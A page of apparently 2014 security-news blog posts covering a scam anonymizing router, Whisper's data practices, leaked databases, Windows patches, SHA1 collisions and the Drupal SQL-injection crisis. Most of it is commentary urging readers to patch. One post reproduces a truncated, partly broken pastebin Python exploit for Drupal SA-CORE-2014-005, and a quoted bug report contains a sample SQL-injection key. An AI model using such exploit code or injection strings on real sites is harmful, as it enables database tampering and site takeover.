- Page 5

  • anabox hyped up new anonimizing router is a scam

    it is now the time for many scammers to start with crowdfunded proposals that are in fact just a ripp-off but if they get hyped up by journalists not doing their work although they have the necessary resources or contacts than this can turn into a big mess

    maybe these crowdfunding firms should invest a bit of their margins into testing all those propositions before presenting whatever investment before the public - just as a bank has to review a company before taking its proposals online for the nonsuspecting public

    from source

    • They are intentionally misleading the public (LYING) about the device being fully open source, while it’s not. Hardware, the most important part of the device, is not open source. It’s a Chinese knockoff of TP-Link “3G routers” which opens the possibilities for a hardware backdoors in the hardware (think of Huawei backdoors). The reason why they did so is simple, nobody would buy the device in such numbers. Everyone would just build their own device.
    • Their Tor package is actually The Grugq’s Portal (linked in edit above).
    • OpenWRT is so BADLY configured by Anonabox team that device that is supposed to protect you is actually giving away your information. The device has BACKDOOR root password, OPEN wireless network (so anyone can connect to it) and is shipped with SSHD!!! This means that anyone can take control of the device!


  • whisper is not anonymous and doesn't protect your privacy - period

    "User data, including Whisper postings that users believe they have deleted, is collated in a searchable database. The company has no access to users’ names or phone numbers, but is storing information about the precise time and approximate location of all previous messages posted through the app. The data, which stretches back to the app’s launch in 2012, is being stored indefinitely, a practice seemingly at odds with Whisper’s stated policy of holding the data only for “a brief period of time”.

    • A team headed by Whisper’s editor-in-chief, Neetzan Zimmerman, is closely monitoring users it believes are potentially newsworthy, delving into the history of their activity on the app and tracking their movements through the mapping tool. Among the many users currently being targeted are military personnel and individuals claiming to work at Yahoo, Disney and on Capitol Hill.
    • Whisper’s policy toward sharing user data with law enforcement has prompted it on occasions to provide information to both the FBI and MI5. Both cases involved potentially imminent threats to life, Whisper said, a practice standard in the tech industry. But privacy experts who reviewed Whisper’s terms of service for the Guardian said the company appeared to require a lower legal threshold for providing user information to authorities than other tech companies.

    do not believe what they say but what they do and especially after someone proofs it and they don't deny it - only change their privacy rules

  • 500MB documents leaked from the DNR represenation in Moscow #ukraine

    In the archive you will find a lot of documentation leaders DNR relations Vitrenko and presidential Ataman Rosiyiskoho KazachYestva, memoranda concerning the relationship of some pretty famous Ukrainian people and their participation in information projects NPT, including Chairman Yegor Sobolev lyustratsiynoho Committee and Deputy Chairman of the Fiscal Service of Ukraine - Mr. Vladimir Khomenko and many other very interesting material.



    Лінки на архіви





    Ukrainans will need some social search and translation about these documents if they want to honour the work from these cyberguerilla's

  • the other Darkweb : freenet plans a massive upgrade


    this is a very interesting set of slides about the technology and the future of freenet that wants to start a massive upgrade to make surveillance a lot more difficult

  • where older windows OS vulnerable to badusb attacks for years (upgrade your systems)

    there is some discussion now about one of the patches in the package this month because it seems that it was already patched years ago for windows7 and recenter systems but not for those before and that only now the patch is being extended to these older systems

    Badusb attacks were by this possible on these older systems for year if the analysis is just

    it proofs that for your critical systems it is always better to follow the upgrades of the OS

    source http://blog.beyondtrust.com/ms14-063-fastfat-vulnerability-fixed-years-ago

  • this is why you should patch your 64bits windows servers immediately - rootkit already in use

    for some time by Chinese APT gangs

    the full description you will find here http://blog.crowdstrike.com/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/

  • this is the code that is used to attack #drupal websites that aren't patched yet

    to patch go to drupal.org and nowhere else

    this is the code that was posted on pastebin that is used to attack drupal websites - quite simple - and scans and attacks are happing at high-speed

    #Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
    #Creditz to https://www.reddit.com/user/fyukyuk
    import urllib2,sys
    from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
    host = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    if len(sys.argv) != 3:
        print "host username password"
        print "http://nope.io admin wowsecure"
    hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
    target = '%s/?q=node&destination=node' % host
    post_data = "name[0%20;update+users+set+name%3d'"
    content = urllib2.urlopen(url=target, data=post_data).read()
    if "mb_strlen() expects parameter 1" in content:
            print "Success!nLogin now with user:%s and pass:%s" % (user, password)
  • why it is urgent to kill totally SHA1 to protect SHA2 from fake certs made with SHA1 (how it is done)

    this is a good explanation

    "To which I asked: "How can an attacker who can generate SHA-1 collisions make a fake cert for a cite using SHA-256? And if that's true, how does updating to SHA-256 help anybody?"


    @schoen replied:


    Take a look at the analogy of MD5, the previous obsolete hash algorithm
    used to generate digital certificates.


    There, the attacker would generate two certificates whose content had the same MD5 value. One certificate might be for legitimate.org (which the attacker had registered), while another certificate might be for victim.com (which belongs to a third party). Because the certificates' content has the same MD5 value, if a CA signs that MD5 value, it is effectively signing both certificates (in the sense that a browser can't tell that the attacker is lying if the attacker presents the CA's signature together with the victim.com certificate instead of the legitimate.org certificate). The CA doesn't realize that it's signing the victim.com certificate because it never sees that certificate and doesn't even know that it exists.

    The effectiveness of that attack doesn't depend on what kind of certificate victim.com already has (if any) or on any of the algorithms that were intentionally used by victim.com. Even if victim.com was using SHA-256 for its cert (issued by AwesomeCA Ltd., let's say), the attacker can still get some other CA (Ancient Algorithms, Inc.?) to issue the colliding MD5 cert that refers to victim.com, and then use that cert in an attack.

    The same kinds of risks then apply to SHA-1, if we think that the same kinds of attacks will be feasible against SHA-1 that were feasible against MD5.

    So the benefit of upgrading is (as you describe it correctly on the site) that people who are trying to phase out the old algorithms can actually do so. If everybody or most everybody upgrades, then certs that use the old algorithms look suspicious (and eventually people can stop accepting them, or stop accepting some of them in particular contexts). If nobody or few people upgrade, then there's no way to distinguish between a legitimate cert with an old algorithm and a fake cert with an old algorithm. You could think of this as an ecosystemic benefit rather than a benefit to each individual site that upgrades its cert.

    There are some cases in which you can maybe get an individual site benefit, having to do with cert pinning, where you try to stop other people from accepting some purported certs for your domain if the provenance of those certs is not what you expect. I guess most site operators don't currently use those mechanisms, though.


    I'll update the copy to make this point more clear, and to link to http://www.win.tue.nl/hashclash/rogue-ca/, which is an excellent depiction of the problem.

    you should also read this because Google has decided to start begin taking action, beginning with Chrome https://konklone.com/post/why-google-is-hurrying-the-web-to-kill-sha-1

    all important belgian websites still use sha1 even the most important one - except if they are changing this while upgrading their ssl certificates (use ssllabs.com to test)

  • the project to work at a real change of the SSL security, dump TLS

    source http://clearcrypt.org/tls/

    this post also gives much more information and has a mailinglist

  • the start of the project to open the software to set up UMTS (mobile phone) networks

    this is the code they will use to develop their own codes, to install 'rogue' spying or free 3G networks on cheap hardware

    they will also find easier security mistakes or open routes and bad code into the real stations

    source https://github.com/RangeNetworks/OpenBTS-UMTS

  • dropbox hosted and protected a fake login page to dropbox that steals passwords

    this means that the securityteams of dropbox - just like those from yahoo - are not doing enough to stop internal phishing campaigns in which the users may be more easy fooled than if they came from other emailaddresses on another infrastructure within another SSL protection

    source http://www.symantec.com/connect/blogs/dropbox-users-targeted-phishing-scam-hosted-dropbox

  • Microsoft wants making multipatching multireboot faster but makes a mess of it

    for some old-school securitypeople like me, we remember that at first Microsoft asked multiple reboots and each patch had its own reboots. This was sometimes a hassle and so on but you were sure that a patch worked even if it was one at a time but when a patch posed problems, you just went back in time and went on to the next patch 

    now Microsoft has changed this into one reboot for all the patches and this has so many risks because there are so many things that have to change in so many different sections of the kernel and libraries that you can never be sure that all these changes are done in the right order and don't conflict with each other

    the best thing that Microsoft can do is to return to multiboot or to give the possibility to multiboot if one choses this or if there are problems



  • #opchina publishes huge chinese emaillists (also belgians) for next waves of attacks

    #opchina in big swing, preparing here other attacks by publishing lists of emailaddress (also belgians) that will receive all kinds of trojans, phishing and passwordstealers for the next waves of attacks

  • hacked and leaked lovero.nl - also belgians

    the passwords are too short even encrypted not to be broken

  • hacked and leaked (also belgians) gepl.net

    also belgians didn't test the socalled encrytption

  • hacked and leaked : tourism Canada

    login and password withoiut emailaddress

  • hacked and leaked (with belgians) hairbox.fr

    logins published

  • will Belgium become a legal host for 14+ sexporn online ?

    Today sex between kids under 16 or in which one of both is younger than 16 is illegal. Not that this law is enforced in a very strict way but it is something useful to have if the police is facing childporn in which the age of the kids i what they call in porn sites 'barely legal'.

    Now the government has decided that it will discuss the possibility of lowering the age to 14 years.

    They should make one difference. It would be 14 years if it is 'PRIVATE' sex between two consulting people and even better with the consent of the parents.

    If one should only lower the age, than the risk exists that it will be legal in Belgium (but for the whole world to see) to post porn with 14 years old for which exists a certain public.

    We have still a long way to go in this discussion but one should add in this internetdriven world that it is about private non-commercial sex. (and that it is not private even when one has to fill in a password, be invited or whatever scam around this)

  • this is the one year old Drupal bug sending panic waves through Drupal land

    yep nearly one year old 

    nothing happened untill somebody throught that it was interesting to use in an attack 


    Database ExpandArguments placeholder naming issues when using array



    When expading array argument in query, current code uses the array key values themselves to generate the query placeholders.

    This poses 3 problems:

    [1] Low degree of "repetitivity" between queries, that difficults implementation of advanced query caching. In SQL Server driver we are using regex all the time to manipulate queries.

    [2] User can easily crash the query if it includes no placeholder-valid characters (alphanumeric + underscore) in the keys passed in the argument. So, this will break the query:

    $params[':nids'] = array(
    'uid1' => 5,
    'what a bad placeholder name why should we care ?¿?' => 6,

    db_query('SELECT UID FROM USERS WHERE USERS.UID IN (:nids)', $params);

    [3] Posible door open for SQL injection?

    I've tried for a while with someting like this:

    $params[':nids'] = array(
    'ok' => 5,
    'ok2) OR (1=1) OR 5 IN (5' => 6,
    'ok2' => 7

    db_query('SELECT UID FROM USERS WHERE USERS.UID IN (:nids)', $params);

    But I am running SQL Server and the only why I can think of exploiting this would be using duplicate placeholder, wich MySQL swallows but SQL Server complains about. Maybe someone with MySQL can give a try and see if it can make it work.

    Anyways, I don't understand why it is using the array keys passed by the user to generate the placeholders, makes no sense to me.

    I've moved this into MAJOR due to points [2] and [3], feel free to downgrade.


  • year old drupal critical securitybug effectively attacked now - patch available

    If you have a drupal site you should start immediately the upgrade. THe drupal people say that patching enough is not enough and won't guarantee that there no other bugs in the code. This means that you have to upgrade to the latest version that came out yesterday. 

    This is a very critical bug because it lets anyone without any authentification inject all the code that they want in your website or even take control over your website. 

    The drupal site also says that there are NO rules in the WAF (web application Firewall) that are so coherent that will protect against all the different kinds of attacks that can be performed with this bug. 

    On the drupal site people also say that attacks coming out of Russia (do you need traffic coming out of Russia ? I don't so I just drop it)  are ongoing and permanent. Several succesful attackcodes are available at pastebin and elsewhere. 

    This bug was in the public list of bugs for over a year before anyone took notice and shows another time the single biggest issue with those opensource projects. All the developers were at the time at their conference when the code and attacks started (so there was some social engineering in the timing of the attacks which is typical of modern day professional attacks). 



    Nobody is going to complain if you put now your site in maintenance for a short while so you can upgrade like you should